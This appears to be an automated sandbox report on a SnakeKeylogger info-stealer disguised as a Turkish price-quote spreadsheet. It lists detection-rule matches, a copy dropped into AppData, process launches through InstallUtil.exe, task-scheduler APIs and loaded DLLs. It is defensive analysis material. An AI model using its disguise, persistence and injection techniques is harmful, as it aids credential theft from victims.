                    Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, GlobalWrapper.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/2@3/3
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile created: C:\Users\user\AppData\Roaming\Tojeiuai.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: InstallUtil.exe, 00000004.00000002.4496902509.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeReversingLabs: Detection: 34%
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeVirustotal: Detection: 42%
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile read: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Tojeiuai.exe "C:\Users\user\AppData\Roaming\Tojeiuai.exe"
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
